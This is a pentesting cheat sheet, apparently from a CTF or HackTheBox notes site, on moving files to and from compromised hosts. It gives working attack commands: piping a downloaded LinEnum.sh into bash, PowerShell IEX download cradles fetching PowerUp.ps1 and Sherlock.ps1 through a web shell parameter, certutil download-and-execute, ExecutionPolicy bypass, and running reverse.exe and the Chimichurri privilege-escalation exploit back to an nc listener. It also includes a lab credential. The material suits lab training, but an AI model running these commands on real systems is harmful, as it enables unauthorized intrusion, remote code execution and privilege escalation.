Transfer Files

Curl

vim script.py
python -m SimpleHTTPServer 80                     ..share
curl http://10.x.x.x:80/script.py -o /opt/tmp.py  ..d/l overwrite
curl $MyIP:80/LinEnum.sh | bash                   ..d/l execute (linux)

curl --user david:Nowonly4me http://10.x.x.x/~david/
curl --user david:Nowonly4me --negotiate http://10.x.x.x/~david/

smbserver

Share from Linux SMB to Windows

locate smbserver.py                             ..find
cd /usr/share/doc/python3-impacket/examples     ..prep
sudo python3 ./smbserver.py share /tmp          ..share
impacket-smbserver share `pwd`                  ..another method
smbclient -L 10.x.x.x --no-pass                 ..test

net view \\10.x.x.x                             ..windows command
net use z: \\10.x.x.x\pub                       ..map a drive
copy "Oracle Issue.txt" z:                      ..copy file
dir \\10.x.x.x\share                            ..windows list directory
copy \\10.x.x.x\share\app C:\Windows\Temp\      ..windows copy
\\10.x.x.x\share\reverse.exe                    ..run

Linux: Copy to Windows Share

smbclient //10.x.x.x/sharename -U domain/username

Linux: Mount Windows Share

mkdir /mnt/smbshare
sudo mount -t cifs //serverfs/c$ -o username=bob,password=xyz /mnt/smbshare
cd /mnt/smbshare

Windows: Copy to Windows Share

copy exploit.exe \\10.x.x.x\users\bob

HTTP Server One Liners

> python2 -m SimpleHTTPServer 80
> python3 -m http.server 80

> php -S localhost:80 -t evil/

> while true; do nc -l 80 < test.html; done

> ncat -k -l -p 80 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html"

> perl -MIO::All -e 'io(":80")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'

> ruby -run -e httpd . -p 80

From inetd.conf:
> 80 stream tcp nowait nobody cat cat /somefile
... where /somefile has the HTTP response line, headers and body

Powershell

PowershellCheatsheet
Share with Linux: python3 - m http.server
Download with Window Powershell

----------------------
powershell.exe "(New-Object System.Net.WebClient).Downloadfile('http://$MyIP:8000/myfile','myfile')"

----------------------
echo IEX(New-Object Net.WebClient).DownloadString('http://<ip>:<port>/Sherlock.ps1') | powershell -noprofile

----------------------
echo $WebClient = New-Object System.Net.WebClient > wget.ps1
echo $WebClient.DownloadFile($Args[0],$Args[1]) >>  wget.ps1
powershell -ExecutionPolicy Bypass -File wget.ps1 http://$MyIP:8000/file.exe file.exe

----------------------
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=echo IES(New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/PowerUp.ps1')|powershell -noprofile

Powershell Advanced

Can't execute the payload?
Powershell ByPass Execution Policy
Example: ChimichurriWindowsPrivEsc

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp

echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1

Chimichurri.exe 10.10.14.x 5555
nc -nvlp 5555
connected ..system!!

smb setup issues

Run smbserver.py from Linux
Now Windows can share back to Linux
https://blog.ropnop.com/transferring-files-from-kali-to-windows/
https://github.com/SecureAuthCorp/impacket
REF: ChurrascoWindowsPrivEsc

------------------------
Install Attempts:

python --version
python3 --version
apt-get install python3.6-dev libmysqlclient-dev
pip install --upgrade setuptools --user python
sudo apt-get install libpcap-dev libpq-dev
pip3 install --upgrade setuptools --user python
cd /opt/impacket
sudo -i
git clone https://github.com/SecureAuthCorp/impacket.git
pip install .
pip3 install .
python3 -m pip install -U pip
python3 -m pip install -U setuptools
pip install impacket
pip3 install impacket

smb setup impacket python2

Install the old pip (unofficial way)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py

PATH=/home/kali/.local/bin:$PATH     ..update PATH manually

pip --version                        ..confirm v2 not v3
pip 20.3.4 from /home/kali/.local/lib/python2.7/site-packages/pip (python 2.7)

pip install --upgrade setuptools
pip install impacket

smb optional

Example: DrupalPhpVuln

> impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami

nc

Easy:

nc -lp 4444 > out.file
nc -w 3 DestIP 4444 < out.file


Faster:

nc -lp 4444 | uncompress -c | tar xvfp -
tar cfp - /some/dir | compress -c | nc -w 3 DestIP 4444


Whole Hard Drive:

dd if=/dev/hda3 | gzip -9 | nc -l 3333
nc DestIP 3333 | pv -b > hdImage.img.gz

updog

Looks like an interesting option if you need SSL
https://github.com/sc0tfree/updog
Default port 9090

updog
updog -p 4444 --ssl
updog -d /tmp --password mypax

ftp

anonymous, writable, port 2121
https://pythonhosted.org/pyftpdlib/faqs.html

linux:
pip install pyftpdlib
python -m pyftpdlib -w
python3 -m pyftpdlib -p 21 -u mike -P paxx
 
windows:
ftp
open $MyIP
user mike passwurd
passive
put localfilename remotefilename
bye

ftp -n < ftpcommands.txt   ..optional

Permission Trouble

You may have a permissions problem
Save and execute from the Temp folder!

cd C:\Windows\Temp\
copy \\10.x.x.x\share\myapp.exe .
myapp.exe

certutil

You can download files on Windows with this tool
REF: bountyHTB

rs.Exec("certutil -urlcache -split -f http://10.x.x.x/agent.exe C:\\users\\public\\agent.exe")
rs.Exec("cmd /c C:\users\public\agent.exe")   ..execute
http://10.x.x.x/UploadedFiles/web.config      ..execute

PreviousTAR backups Nextvnc

Last updated 2 years ago

Was this helpful?

More

Curl

smbserver

Windows Share

HTTP Server One Liners

Powershell

Powershell Advanced

smb setup issues

smb setup impacket python2

smb optional

nc

updog

ftp

Permission Trouble

certutil